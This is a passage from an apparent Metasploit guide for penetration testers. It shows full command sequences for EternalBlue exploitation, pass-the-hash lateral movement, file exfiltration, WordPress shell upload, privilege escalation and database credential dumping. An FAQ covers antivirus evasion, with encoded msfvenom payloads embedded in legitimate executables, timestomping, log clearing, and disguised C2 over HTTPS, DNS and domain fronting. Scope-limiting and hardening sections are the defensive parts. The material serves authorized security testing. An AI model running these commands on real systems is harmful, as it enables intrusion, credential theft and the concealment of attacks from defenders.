msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
# Phase 5: Post-exploitation and lateral movement
msf6 > sessions -i 1
meterpreter > run post/windows/gather/smart hashdump
meterpreter > background
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.1.20
msf6 exploit(windows/smb/psexec) > exploit
# Phase 6: Data exfiltration and documentation
meterpreter > download C:\\Users\\Administrator\\Documents
C:\\Temp\\exfiltrated
# Phase 7: Clean-up and evidence removal
meterpreter > clearev
meterpreter > run post/windows/manage/delete_logs
# Phase 8: Reporting and analysis
msf6 > db_export -f xml corporate_assessment.xml
```

# **Web Application Security Assessment**

This scenario focuses on web application vulnerabilities:

```
# Phase 1: Web application mapping
msf6 > use auxiliary/scanner/http/crawler
msf6 auxiliary(scanner/http/crawler) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/http/crawler) > run

# Phase 2: Vulnerability scanning
msf6 > use auxiliary/scanner/http/sqlmap
msf6 auxiliary(scanner/http/sqlmap) > set URL
https://192.168.1.50/search.php
msf6 auxiliary(scanner/http/sqlmap) > set METHOD GET
msf6 auxiliary(scanner/http/sqlmap) > set GET_PARAMS id=1
msf6 auxiliary(scanner/http/sqlmap) > run
```

```
msf6 > use auxiliary/scanner/http/wordpress login enum
msf6 auxiliary(scanner/http/wordpress login enum) > set RHOSTS 192.168.1.50
msf6 auxiliary(scanner/http/wordpress_login_enum) > run
# Phase 3: Targeted exploitation
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD password123
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.50
msf6 exploit(unix/webapp/wp admin shell upload) > exploit
# Phase 4: Privilege escalation on web server
meterpreter > getuid
meterpreter > background
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local exploit suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
msf6 > use exploit/linux/local/overlayfs_priv_esc
msf6 exploit(linux/local/overlayfs_priv_esc) > set SESSION 1
msf6 exploit(linux/local/overlayfs_priv_esc) > exploit
# Phase 5: Data extraction from web application databases
meterpreter > shell
shell> mysql -u root -p
mysql> show databases;
mysql> use wordpress;
mysql> select user_login, user_pass from wp_users;
mysql> exit
```

# **Best Practices and Ethical Considerations**

#### **Documentation and Evidence Collection**

Implement methodical documentation during security assessments:

```
# Enable session logging
msf6 > spool /path/to/msf_session_log.txt

# Collect specific evidence
msf6 > sessions -i 1
meterpreter > screenshot
meterpreter > run post/windows/gather/forensics/imager DRIVE=C

# Use notes functionality for important findings
msf6 > notes
```

```
msf6 > note -t domain_creds -d "Found domain admin credentials" -c
"Administrator:Hash"

# Document host information
msf6 > hosts -c address,os_name,purpose
msf6 > services -c port,proto,name,info

# Export detailed results
msf6 > db_export -f xml assessment_results.xml
msf6 > spool off
```

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#### **Operational Security Considerations**

Maintain operational security throughout assessments:

```
# Configure connection obfuscation
msf6 > use payload/windows/meterpreter/reverse https
msf6 payload(windows/meterpreter/reverse_https) > set StagerVerifySSLCert
true
msf6 payload(windows/meterpreter/reverse_https) > set HandlerSSLCert
/path/to/legitimate_cert.pem
msf6 payload(windows/meterpreter/reverse_https) > set
SessionCommunicationTimeout 300
msf6 payload(windows/meterpreter/reverse https) > set EnableStageEncoding
true
msf6 payload(windows/meterpreter/reverse https) > set StageEncoder
x86/shikata ga nai
msf6 payload(windows/meterpreter/reverse_https) > set HttpUserAgent
# Implement secure cleanup procedures
msf6 > sessions -i 1
meterpreter > getsystem
meterpreter > timestomp C:\\Windows\\Temp\\payload.exe -z "01/01/2020
12:00:00"
meterpreter > rm C:\\Windows\\Temp\\payload.exe
meterpreter > clearev
meterpreter > run post/windows/manage/delete_logs
# Use resource files to ensure consistent procedures
cat > secure_operations.rc << EOF</pre>
spool /tmp/assessment_log.txt
setg LHOST 192.168.1.100
setg LPORT 443
setg EnableStageEncoding true
setg StageEncoder x86/shikata_ga_nai
setg SessionCommunicationTimeout 300
setg HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
```

```
AppleWebKit/537.36"
EOF
```

#### **Authorization and Scope Management**

Establish clear boundaries for security assessments:

```
# Create a target-limited resource script
cat > authorized_scope.rc << EOF</pre>
# Only scan authorized targets
setg RHOSTS 192.168.1.50,192.168.1.51,192.168.1.100-192.168.1.110
# Limit testing to specified ports
setg RPORTS 80,443,22,3389
# Avoid dangerous modules
setg BADMODULES auxiliary/dos,exploit/windows/smb/ms08 067 netapi
# Custom function to check if module is allowed
<ruby>
def check module(mod)
 bad_modules = framework.datastore['BADMODULES'].split(',')
 bad modules.each do |bad|
    if mod.fullname.include?(bad)
      print error("Module #{mod.fullname} is not allowed in this
assessment!")
     return false
   end
 return true
end
def is host allowed(host)
 allowed = framework.datastore['RHOSTS'].split(',')
  allowed.each do |range|
   if range.include?('-')
      start_ip, end_ip = range.split('-')
      if Rex::Socket.addr_atoi(host) >= Rex::Socket.addr_atoi(start_ip) &&
         Rex::Socket.addr_atoi(host) <= Rex::Socket.addr_atoi(end_ip)</pre>
        return true
      end
   elsif host == range
      return true
   end
 print_error("Host #{host} is outside authorized scope!")
 return false
end
```

```
# Override module exec to enforce restrictions
alias original mod execute framework.modules.method(:execute)
framework.modules.singleton class.send(:define method, :execute) do |name,
 mod = framework.modules.create(name)
 if check_module(mod)
   if mod.datastore['RHOSTS']
      hosts = mod.datastore['RHOSTS'].split(' ')
      hosts.each do |h|
        if !is_host_allowed(h)
          return nil
        end
      end
   end
   original mod execute.call(name, *args)
  else
   nil
 end
end
</ruby>
# Log all activities for audit
spool /tmp/authorized assessment log.txt
EOF
```

#### Conclusion

The Metasploit Framework stands as one of cybersecurity's most versatile and powerful platforms, offering comprehensive capabilities for all phases of security testing. This technical guide has explored the advanced techniques and command syntax necessary to leverage Metasploit's full potential, from sophisticated exploitation to custom module development.

As security professionals continue to face evolving threats and defensive technologies, mastering Metasploit's advanced features provides a significant advantage in identifying vulnerabilities before malicious actors can exploit them. By combining Metasploit's capabilities with sound methodology and ethical practices, security teams can substantially improve their organization's security posture.

The key to effective Metasploit utilization lies not just in executing individual commands, but in developing a comprehensive workflow that integrates reconnaissance, exploitation, post-exploitation, and documentation into a cohesive assessment methodology. This approach, combined with custom automation and module development, enables security professionals to conduct thorough, efficient, and ethical security evaluations.

# **Frequently Asked Questions**

#### How can I optimize Metasploit for large-scale enterprise environments?

For efficient operation in enterprise environments:

**Database Optimization:** Ensure PostgreSQL is properly configured with adequate resources. Consider using autovacuum\_analyze\_scale\_factor = 0.01 and maintenance work mem = 256MB in postgresql.conf for large datasets.

**Workspace Management**: Create separate workspaces for different network segments or assessment phases:

```
msf6 > workspace -a dmz_assessment
msf6 > workspace -a internal_network
msf6 > workspace -a critical_systems
```

**Resource Utilization Control**: Adjust thread counts and scan timing based on network capacity:

```
msf6 > setg THREADS 25
msf6 > set TIMEOUT 120
msf6 > set ConnectTimeout 10
```

**Distributed Operations**: For very large environments, deploy multiple Metasploit instances with coordinated scope:

```
# First instance
```

```
msf6 > setg RHOSTS 10.0.0.0/16

# Second instance
msf6 > setg RHOSTS 10.1.0.0/16
```

**Targeted Scanning**: Focus on high-value targets and services rather than comprehensive scanning:

```
msf6 > db_nmap -sV -p 80,443,3389,22 --open 10.0.0.0/24
```

Automated Workflows: Create environment-specific resource scripts for consistent execution.

# What are the most effective ways to evade detection while using Metasploit?

Several advanced techniques can minimize detection:

**Custom Payload Generation**: Create payloads with multiple encoders and custom templates:

```
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443
\
    -e x86/shikata_ga_nai -i 10 \
    -x /path/to/legitimate.exe \
    -f exe -o custom_payload.exe
```

**Communication Obfuscation**: Modify C2 traffic patterns with advanced options:

```
msf6 > set EnableStageEncoding true
msf6 > set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Chrome/90.0.4430.212"
msf6 > set SessionCommunicationTimeout 30
msf6 > set HttpUnknownRequestResponse "<html><body>It works!</body></html>"
```

**Operational Timing:** Control activity timing to avoid pattern detection:

```
msf6 > set WfsDelay 30
msf6 > set EnableContextEncoding true
msf6 > run post/windows/manage/timestomp OPTION=SET_FILE
FILE=C:\\payload.exe
```

Memory-Only Payloads: Use reflective loading techniques:

```
msf6 > use exploit/windows/smb/psexec_psh
msf6 > set PAYLOAD windows/meterpreter/reverse_https
msf6 > set ReverseConnectRetries 5
```

**Alternative Channels**: Leverage uncommon protocols for C2:

```
msf6 > use payload/windows/meterpreter/reverse_dns
msf6 > set DOMAIN secure-update.company-cdn.com
```

# How can I secure my Metasploit environment from unauthorized access?

Implement these security measures for your Metasploit installation:

Database Security: Configure PostgreSQL with authentication and encryption:

```
# Edit pg_hba.conf
host msf msf 127.0.0.1/32 md5
host all all 0.0.0.0/0 reject

# Set strong password
msfdb init
msfdb reinit
```

**Encrypted Communications**: Configure SSL for RPC and handler connections:

```
# Generate certificates
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj
"/C=US/ST=Security/L=Testing/O=MSF/CN=msf-server" -keyout msf.key -out msf.crt
cat msf.key msf.crt > msf.pem

# Start RPC server with SSL
msfrpcd -S -f -a 127.0.0.1 -p 55553 -U msf_user -P strong_password -c
~/msf.pem
```

**Workspace Isolation**: Implement separate workspaces for different engagements and users:

```
msf6 > workspace -a client_a_segregated
```

File System Permissions: Restrict access to Metasploit directories:

```
chmod 700 ~/.msf4/
chmod 600 ~/.msf4/config
chmod 600 ~/.msf4/history
```

**Logging and Monitoring**: Enable comprehensive logging for audit purposes:

```
msf6 > spool ~/.msf4/logs/msf_$(date +%F_%H-%M-%S).log
```

**Network Restrictions**: Configure host-based firewall rules to limit connectivity:

```
iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 55553 -j ACCEPT iptables -A INPUT -p tcp --dport 55553 -j DROP
```

#### What are the best practices for developing custom Metasploit modules?

Follow these guidelines for effective module development:

**Structure and Documentation**: Implement thorough documentation:

```
'Name'
                 => 'Descriptive Module Name',
                 => %q{
'Description'
 Detailed explanation of what the module does,
 including vulnerability details and any specific
 version requirements or limitations.
},
'Author'
                 => [
  'Original Researcher',
 'Module Developer Name',
],
'License'
                 => MSF LICENSE,
'References'
                => [
 ['CVE', '2021-XXXXX'],
 ['URL', 'https://example.com/vulnerability-details'],
 ['PACKETSTORM', '12345']
],
```

**Error Handling**: Implement robust error handling for reliability:

```
begin
  # Critical operation
  connect
  # ...

rescue ::Rex::ConnectionRefused
  print_error("Connection refused")
  return

rescue ::Rex::HostUnreachable
  print_error("Host unreachable")
  return

rescue ::Rex::ConnectionTimeout
  print_error("Connection timed out")
  return

rescue => e
  print_error("Unhandled exception: #{e.class} - #{e.message}")
  return
```

```
ensure
disconnect
end
```

**Testing Methodology**: Test modules thoroughly in isolated environments:

```
def check
 begin
   res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'version')
   })
   if res && res.code == 200
      if version <= Rex::Version.new('1.2.3')</pre>
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
   end
   return Exploit::CheckCode::Unknown
 rescue
    return Exploit::CheckCode::Unknown
 end
end
```

**Optimize Performance**: Minimize network transactions and resource usage:

```
# Batch operations where possible
def run_batch(ip_range)
   Rex::Socket::RangeWalker.new(ip_range).each do |ip|
     # Process in batches
   end
end
```

**Follow Framework Conventions**: Adhere to Metasploit's coding standards and module organization:

# How does Metasploit handle Antivirus evasion, and what are its limitations?

Metasploit provides several evasion capabilities, but also has important limitations:

#### **Evasion Techniques:**

Payload Encoding: Multiple encoders can obfuscate signatures:

```
msf6 > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > generate -e
x86/shikata_ga_nai -i 15 -t exe
```

**Template Injection**: Embeds payload in legitimate executables:

```
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -i 10 \
-x /path/to/legitimate.exe -f exe -o modified.exe
```

**In-Memory Execution**: Reduces on-disk artifacts:

```
msf6 > use exploit/windows/smb/psexec_psh
```

**Custom Handlers**: Mimics legitimate traffic patterns:

```
msf6 > set HttpHostHeader office365.com
msf6 > set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36"
```

#### **Limitations:**

- 1. **Signature Detection**: Most built-in payloads are detected by modern AV solutions, requiring frequent updates and customization.
- 2. **Behavioral Detection**: Advanced EDR systems detect Metasploit activities based on behavior patterns rather than signatures.
- 3. **Standard Methods**: Many built-in post-exploitation modules use techniques monitored by security tools.
- 4. **Limited Evasion Modules**: The framework's evasion category contains fewer modules than other categories.

#### **Advanced Evasion Approaches:**

**Custom Shellcode Development**: Create unique shellcode outside Metasploit's standard library:

```
# Generate raw shellcode
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100
LPORT=443 -f raw > shellcode.bin

# Use custom loader
# Example: Integrate with custom C# loader that uses alternative execution
techniques
```

**Alternative Execution Methods**: Leverage LOLBins (Living Off the Land Binaries):

```
# Generate PowerShell command
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100
LPORT=443 -f psh -o payload.ps1
# Use mshta or other LOLBins for execution
```

**Domain Fronting:** Configure redirectors and domain fronting for C2 obfuscation:

```
# Set up external redirector
msf6 > set LHOST redirector.example.com
msf6 > set LPORT 443
msf6 > set HttpHostHeader legitimate-cdn.com
```

For maximum evasion, security professionals often need to develop custom loaders and techniques outside of Metasploit's standard capabilities.

